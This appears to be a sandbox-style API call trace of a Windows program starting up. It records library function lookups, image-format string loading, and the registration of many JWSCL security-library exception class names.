[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0159.877] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0159.878] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0159.878] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0159.878] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0159.878] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0159.878] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0159.878] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0159.878] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0159.878] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0159.878] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0159.878] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0159.879] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0159.879] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0159.879] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0159.879] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0159.879] LoadStringA (in: hInstance=0x28e0000, uID=0xff59, lpBuffer=0x24eefc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0159.879] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0159.879] LoadStringA (in: hInstance=0x28e0000, uID=0xff5a, lpBuffer=0x24eefc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0159.879] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0159.879] LoadStringA (in: hInstance=0x28e0000, uID=0xff5b, lpBuffer=0x24eefc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0159.879] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0159.879] LoadStringA (in: hInstance=0x28e0000, uID=0xff5c, lpBuffer=0x24eefc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0159.879] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0159.879] SetErrorMode (uMode=0x8000) returned 0x1
[0159.879] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d790000
[0159.882] SetErrorMode (uMode=0x1) returned 0x8000
[0159.882] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePropertyFrame") returned 0x6d7920ea
[0159.882] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreateFontIndirect") returned 0x6d7920b7
[0159.882] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePictureIndirect") returned 0x6d7920c8
[0159.882] GetProcAddress (hModule=0x6d790000, lpProcName="OleLoadPicture") returned 0x6d7920d9
[0159.882] SysReAllocStringLen (in: pbstr=0x29cfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x29cfa98*="EJwsclUnsupportedException") returned 1
[0159.882] SysReAllocStringLen (in: pbstr=0x29cfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x29cfa80*="EJwsclPIDException") returned 1
[0159.882] SysReAllocStringLen (in: pbstr=0x29cfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x29cfa68*="EJwsclJwShellExecuteException") returned 1
[0159.882] SysReAllocStringLen (in: pbstr=0x29cfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x29cfa50*="EJwsclShellExecuteException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x29cfa38*="EJwsclElevationException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x29cfa20*="EJwsclAbortException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x29cfa08*="EJwsclSuRunErrorException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x29cf9f0*="EJwsclElevateProcessException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x29cf9d8*="EJwsclCertApiException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x29cf9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x29cf9a8*="EJwsclInvalidStartupInfo") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x29cf990*="EJwsclFirewallNoExceptionsException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x29cf978*="EJwsclFirewallInactiveException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x29cf960*="EJwsclFirewallDelRuleException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x29cf948*="EJwsclAddUdpPortToFirewallException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x29cf930*="EJwsclAddTcpPortToFirewallException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x29cf918*="EJwsclFirewallAddRuleException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29cf900*="EJwsclSetRemoteAdminAdressException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29cf8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29cf8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29cf8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29cf8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29cf888*="EJwsclGetIncomingPingAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29cf870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29cf858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x29cf840*="EJwsclGetFWStateException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x29cf828*="EJwsclSetFWStateException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x29cf810*="EJwsclFirewallProfileInitException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x29cf7f8*="EJwsclFirewallInitException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x29cf7e0*="EJwsclGenericFirewallException") returned 1
[0159.883] SysReAllocStringLen (in: pbstr=0x29cf7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x29cf7c8*="EJwsclEnumerateProcessFailed") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x29cf7b0*="EJwsclInvalidRegistryPath") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x29cf798*="EJwsclEndOfStream") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x29cf780*="EJwsclClassTypeMismatch") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x29cf768*="EJwsclInvalidHandle") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x29cf750*="EJwsclInvalidIndex") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x29cf738*="EJwsclInvalidSession") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x29cf720*="EJwsclMissingEvent") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x29cf708*="EJwsclInvalidPointerType") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x29cf6f0*="EJwsclCreateProcessFailed") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x29cf6d8*="EJwsclNilPointer") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x29cf6c0*="EJwsclUnimplemented") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x29cf6a8*="EJwsclInitWellKnownException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x29cf690*="EJwsclKeyApiException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x29cf678*="EJwsclKeyException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x29cf660*="EJwsclHashApiException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x29cf648*="EJwsclHashException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x29cf630*="EJwsclCSPApiException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x29cf618*="EJwsclCSPException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x29cf600*="EJwsclTerminalSessionException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x29cf5e8*="EJwsclTerminalServiceNecessary") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x29cf5d0*="EJwsclTerminalServiceException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x29cf5b8*="EJwsclTerminalServerConnectException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x29cf5a0*="EJwsclTerminalServerException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x29cf588*="EJwsclCryptUnsupportedException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x29cf570*="EJwsclCryptApiException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x29cf558*="EJwsclCryptException") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x29cf540*="EJwsclOSError") returned 1
[0159.884] SysReAllocStringLen (in: pbstr=0x29cf528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x29cf528*="EJwsclResourceInitFailed") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x29cf510*="EJwsclResourceUnequalCount") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x29cf4f8*="EJwsclResourceNotFound") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x29cf4e0*="EJwsclResourceException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x29cf4c8*="EJwsclFailedAddACE") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x29cf4b0*="EJwsclUnsupportedACE") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x29cf498*="EJwsclOpenWindowStationException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x29cf480*="EJwsclWindowStationException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x29cf468*="EJwsclCloseDesktopException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x29cf450*="EJwsclCreateDesktopException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x29cf438*="EJwsclOpenDesktopException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x29cf420*="EJwsclDesktopException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x29cf408*="EJwsclSACLAccessDenied") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x29cf3f0*="EJwsclAccessDenied") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x29cf3d8*="EJwsclLSAException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x29cf3c0*="ESetOwnerException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x29cf3a8*="ESetSecurityException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x29cf390*="EJwsclInvalidParentDescriptor") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x29cf378*="EJwsclInvalidKeyPath") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x29cf360*="EJwsclInvalidGenericAccessMask") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x29cf348*="EJwsclAdaptSecurityInfoException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x29cf330*="EJwsclThreadException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x29cf318*="EJwsclInvalidObjectException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x29cf300*="EJwsclSecurityObjectException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x29cf2e8*="EJwsclHashMismatch") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x29cf2d0*="EJwsclStreamHashException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x29cf2b8*="EJwsclStreamInvalidMagicException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x29cf2a0*="EJwsclStreamSizeException") returned 1
[0159.885] SysReAllocStringLen (in: pbstr=0x29cf288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x29cf288*="EJwsclStreamException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x29cf270*="EJwsclNoSuchLogonSession") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x29cf258*="EJwsclInvalidFlagsException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x29cf240*="EJwsclProcessNotFound") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x29cf228*="EJwsclInvalidParameterException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x29cf210*="EJwsclInvalidPathException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x29cf1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x29cf1e0*="EJwsclInvalidRevision") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x29cf1c8*="EJwsclInvalidAceMismatch") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x29cf1b0*="EJwsclRevisionMismatchException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x29cf198*="EJwsclInvalidACEException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x29cf180*="EJwsclReadOnlyPropertyException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x29cf168*="EJwsclDuplicateListEntryException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x29cf150*="EJwsclIndexOutOfBoundsException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x29cf138*="EJwsclInvalidSidAuthorityValue") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x29cf120*="EJwsclInvalidKnownSIDException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x29cf108*="EJwsclInvalidComputer") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x29cf0f0*="EJwsclInvalidGroupSIDException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x29cf0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x29cf0c0*="EJwsclInvalidSIDException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x29cf0a8*="EJwsclInvalidSecurityListException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x29cf090*="EJwsclInvalidMandatoryLevelException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x29cf078*="EJwsclEmptyACLException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x29cf060*="EJwsclNILParameterException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x29cf048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0159.886] SysReAllocStringLen (in: pbstr=0x29cf030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x29cf030*="EJwsclInvalidObjectArrayException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cf018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x29cf018*="EJwsclProcessIdNotAvailable") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cf000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x29cf000*="EJwsclWinCallFailedException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cefe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x29cefe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cefd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x29cefd0*="EJwsclNotImplementedException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cefb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x29cefb8*="EJwsclAccessTypeException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cefa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x29cefa0*="EJwsclAdjustPrivilegeException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x29cef88*="EJwsclPrivilegeCheckException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x29cef70*="EJwsclPrivilegeNotFoundException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x29cef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x29cef40*="EJwsclPrivilegeException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x29cef28*="EJwsclNotEnoughMemory") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x29cef10*="EJwsclInvalidTokenHandle") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29ceef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x29ceef8*="EJwsclNoThreadTokenAvailable") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29ceee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x29ceee0*="EJwsclDuplicateTokenException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29ceec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x29ceec8*="EJwsclInvalidOwnerException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29ceeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x29ceeb0*="EJwsclInvalidPrimaryToken") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x29cee98*="EJwsclTokenPrimaryException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x29cee80*="EJwsclTokenImpersonationException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x29cee68*="EJwsclTokenInformationException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x29cee50*="EJwsclSharedTokenException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x29cee38*="EJwsclOpenProcessTokenException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x29cee20*="EJwsclOpenThreadTokenException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x29cee08*="EJwsclSecurityException") returned 1
[0159.887] SysReAllocStringLen (in: pbstr=0x29cedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x29cedf0*="Exception") returned 1
